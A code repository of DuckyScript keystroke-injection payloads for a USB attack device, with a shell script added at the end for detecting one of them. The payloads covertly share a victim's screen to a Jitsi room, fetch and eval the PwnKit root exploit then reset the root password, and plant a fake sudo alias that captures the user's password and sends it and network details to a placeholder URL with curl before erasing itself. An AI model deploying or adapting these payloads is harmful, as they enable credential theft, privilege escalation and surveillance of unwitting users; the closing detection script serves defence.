├── MacOS_Chrome_ScreenShare.txt
├── MacOS_Firefox_ScreenShare.txt
├── PwnKit_Cred_Changer.txt
├── README.md
└── fake-sudo-exfil
    ├── README.md
    ├── payload.txt
    └── sudo-phishing.sh


/MacOS_Chrome_ScreenShare.txt:
--------------------------------------------------------------------------------
REM Title: ScreenShare MacOS Chrome
REM Author: Skicka 2022
REM Description: Script to share a victim's screen via Chrome on MacOS
REM Target: MacOS (Google Chrome)
REM Props: Hak5, HakCat
REM Version: 1.0
REM Category: Exfil

REM You must set up a Jitsi session first & paste the URL over the example

DELAY 3000
GUI SPACE
DELAY 100
STRING terminal
ENTER
DELAY 2000
STRING open https://meet.jit.si/EXAMPLE -a Google\ Chrome.app
DELAY 1000
ENTER
DELAY 4000
STRING victim
ENTER
DELAY 1000
STRING D
DELAY 1000
TAB
DELAY 1000
ENTER
--------------------------------------------------------------------------------
/MacOS_Firefox_ScreenShare.txt:
--------------------------------------------------------------------------------
REM Title: ScreenShare MacOS Firefox
REM Author: Skicka 2022
REM Description: Script to share a victim's screen via Firefox on MacOS
REM Target: MacOS (Firefox)
REM Props: Hak5, HakCat
REM Version: 1.0
REM Category: Exfil

REM You must set up a Jitsi session first & paste the URL over the example

DELAY 3000
GUI SPACE
DELAY 100
STRING terminal
ENTER
DELAY 2000
STRING open about:config -a Firefox.app
DELAY 500
ENTER
DELAY 1500
ENTER
DELAY 500
STRING media.navigator.permission.disabled
DELAY 500
TAB
TAB
ENTER
GUI N
DELAY 1500
STRING https://meet.jit.si/EXAMPLE
DELAY 100
ENTER
DELAY 1000
STRING ATTACKER
DELAY 1000
ENTER
DELAY 2000
STRING D
REM It's done, the rest is optional
DELAY 2000
GUI TAB
DELAY 100
STRING curl parrot.live
DELAY 100
ENTER
--------------------------------------------------------------------------------
/PwnKit_Cred_Changer.txt:
--------------------------------------------------------------------------------
REM Title: PwnKit Cred Changer
REM Author: Alex Lynd
REM Description: Changes root creds using the PwnKit exploit, disables keyboard / mouse, delivers a devastating rickroll payload.
REM Target: Linux (Bash)
REM Props: Hak5, HakCat
REM Version: 1.0
REM Category: Prank

CTRL ALT T
DELAY 1000

REM disable keyboard
STRING xinput float 10
ENTER

REM disable mouse
STRING xinput float 12
ENTER

REM run PwnKit
STRING eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)"
ENTER
DELAY 1000

REM change root password
STRING passwd
ENTER
STRING meowmeow123
ENTER
DELAY 100
STRING meowmeow123
ENTER
DELAY 300

REM jack up volume
STRING amixer -D pulse sset Master unmute
ENTER
REM STRING amixer -D pulse sset Master 100%+
ENTER

REM download annoying payload
STRING wget https://gist.githubusercontent.com/AlexLynd/2f8081f1940934e19a5a450ca358d142/raw/b6d4bfe05cb73f8140872448da54fb1824c4d627/linux-color-flasher.sh
ENTER
DELAY 500
STRING chmod +x linux-color-flasher.sh
ENTER
STRING ./linux-color-flasher.sh &
ENTER
DELAY 500
STRING espeak "you've been hacked loser, its time to get funky"
ENTER
DELAY 1000
STRING firefox "https://www.youtube.com/watch?v=dQw4w9WgXcQ"
ENTER
DELAY 3000
SPACE
DELAY 1000
STRING F
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# ScriptKitty Payloads
Welcome to the official ScriptKitty payload repository! [](https://github.com/HakCat-Tech/RubberNugget) is a project that lets you easily deploy DuckyScript payloads from a WiFi Nugget, using the hardware interface or through our USB Nugget WebApp.

### Payloads
- **PwnKit_Cred_Changer**: Uses the PwnKit exploit to change root creds on a Linux machine, disables user input, and delivers a devastating rickroll.

- **ScreenShare MacOS Chrome**: Script to share a victim's screen via Chrome on MacOS

- **ScreenShare MacOS Firefox**: Script to share a victim's screen via Firefox on MacOS
--------------------------------------------------------------------------------
/fake-sudo-exfil/README.md:
--------------------------------------------------------------------------------
# Fake sudo

- Title: Fake sudo
- Author: TW-D
- Version: 1.1
- Target: Linux
- Category: Phishing

## Description

1) Copies the "sudo" command spoofing program to the user's home directory.
2) Defines a new persistent "sudo" alias with the file "~/.bash_aliases".
3) When the user "sudoer" executes the command "sudo" in a terminal, the spoofing program:
    - __By default__ retrieves the username and password and writes them to "/tmp/.sudo_password".
    - __But__ this behavior can be changed in line 26 of the "sudo-phishing.sh" file.
4) The spoofing program deletes the "sudo" alias. Then it deletes itself.

## Configuration
Coming soon!
--------------------------------------------------------------------------------
/fake-sudo-exfil/payload.txt:
--------------------------------------------------------------------------------
#!/bin/bash
#
# Title: Fake-sudo
#
# Description:
# This program creates a fake "sudo"
# command by defining a persistent alias.
#
# Author: TW-D
# Version: 1.1
# Category: Phishing
# Target: Linux
# Attackmodes: HID and STORAGE
=
# TESTED ON
# ===============
# Ubuntu 20.04.4 LTS x86_64 (Xfce)


LED R

DELAY 7000
CTRL ALT T
DELAY 7000

LED B

STRING cd /media/$USER/*/Linux/exfil/
ENTER
DELAY 1500

STRING cp ./sudo-phishing.sh ~/.sudo_phishing.sh
ENTER
DELAY 1500

LED C

STRING chmod +x ~/.sudo_phishing.sh
ENTER
DELAY 1500

STRING printf \"\\nalias sudo='~/.sudo_phishing.sh'\\n\" >> ~/.bash_aliases
ENTER
DELAY 1500

LED Y

STRING exit
ENTER
DELAY 1500

LED G
--------------------------------------------------------------------------------
/fake-sudo-exfil/sudo-phishing.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# Fake-sudo
#
# This program imitates the behavior
# of the "sudo" command.
#

if [ -z "${SUDO_PROMPT}" ]; then
    readonly INPUT_MESSAGE="[sudo] password for ${USER}: "
else
    readonly INPUT_MESSAGE="${SUDO_PROMPT}"
fi

readonly MAXIMUM_ATTEMPTS=3
readonly ERROR_MESSAGE="sudo: ${MAXIMUM_ATTEMPTS} incorrect password attempts"

attempts() {
    /bin/echo -n "${INPUT_MESSAGE}"
    read -r -s sudo_password
    /bin/echo ""
    if ( /bin/echo "${sudo_password}" | /usr/bin/sudo -S /bin/true > /dev/null 2>&1 ); then
        ##
        #
        ##
        /bin/echo "${USER}:${sudo_password}" > /tmp/.sudo_password
        curl https://url.here -A "$(cat /tmp/.sudo_password)"
        curl https://url.here -A "$(ifconfig | tr -d '\n')"
        ##
        #
        ##
        /bin/rm ~/.sudo_phishing.sh
        /usr/bin/head -n -1 ~/.bash_aliases > ~/.bash_aliases_bak
        /bin/mv ~/.bash_aliases_bak ~/.bash_aliases
        /bin/echo "${sudo_password}" | /usr/bin/sudo -S "${@}"
        $BASH
        exit 0
    fi
}

if ( (/usr/bin/sudo -n /bin/true > /dev/null 2>&1) || [ "${#}" -eq 0 ] ); then
    /usr/bin/sudo "${@}"
else
    for ((iterator=1; iterator <= MAXIMUM_ATTEMPTS; iterator++)); do
        attempts "${@}"
    done
    /bin/echo "${ERROR_MESSAGE}"
fi
--------------------------------------------------------------------------------
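
Detection side of the fake-sudo steps above (alias appended to "~/.bash_aliases", capture file in /tmp), as an added example that is not part of this repository. The function names, the list of startup files, the verdict strings and the sample home directory are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example, not part of the repository: audit a home directory for the
# sudo shadowing described in fake-sudo-exfil/README.md. Names are illustrative.
RC_FILES=".bash_aliases .bashrc .bash_profile .profile"

# Usage: audit_sudo_shadowing HOME_DIR [TMP_DIR]
# Prints "<verdict> <rcfile>:<line> <target>" per active definition.
audit_sudo_shadowing() (
    home="$1"; tmp="${2:-/tmp}"
    for rc in $RC_FILES; do
        [ -f "$home/$rc" ] || continue
        # Aliases named sudo; commented-out lines do not match.
        grep -nE '^[[:space:]]*alias[[:space:]]+sudo=' "$home/$rc" |
        while IFS= read -r hit; do
            # Drop "alias sudo=" and the quotes, keep the command word.
            target=$(printf '%s\n' "${hit#*:}" | sed -E \
                "s/^[[:space:]]*alias[[:space:]]+sudo=//; s/^[\"']//; s/[\"'][[:space:]]*\$//")
            target=${target%% *}
            case "$target" in
                sudo|/usr/bin/sudo|/bin/sudo)  # e.g. alias sudo='sudo '
                    echo "benign $rc:${hit%%:*} $target" ;;
                *)
                    echo "SUSPICIOUS $rc:${hit%%:*} $target" ;;
            esac
        done
        # A shell function named sudo shadows the binary the same way.
        grep -nE '^[[:space:]]*(function[[:space:]]+sudo([^[:alnum:]_-]|$)|sudo[[:space:]]*\(\))' "$home/$rc" |
        while IFS= read -r hit; do
            echo "SUSPICIOUS $rc:${hit%%:*} function"
        done
    done
    # Default capture file named in the README; the script does not remove it.
    if [ -f "$tmp/.sudo_password" ]; then
        echo "SUSPICIOUS capture-file $tmp/.sudo_password"
    fi
)

# Constructed sample home: a benign alias, a commented-out alias, and the
# alias line the payload appends to ~/.bash_aliases.
make_sample_home() {
    d=$(mktemp -d)
    printf "alias sudo='sudo '\n# alias sudo='old'\n" > "$d/.bashrc"
    printf "alias ll='ls -l'\n\nalias sudo='~/.sudo_phishing.sh'\n" > "$d/.bash_aliases"
    echo "$d"
}
```

Calling audit_sudo_shadowing "$HOME" audits the current account; because the spoofing program removes its alias and itself after a successful capture, the capture-file check may be the only finding left on a host where it already ran.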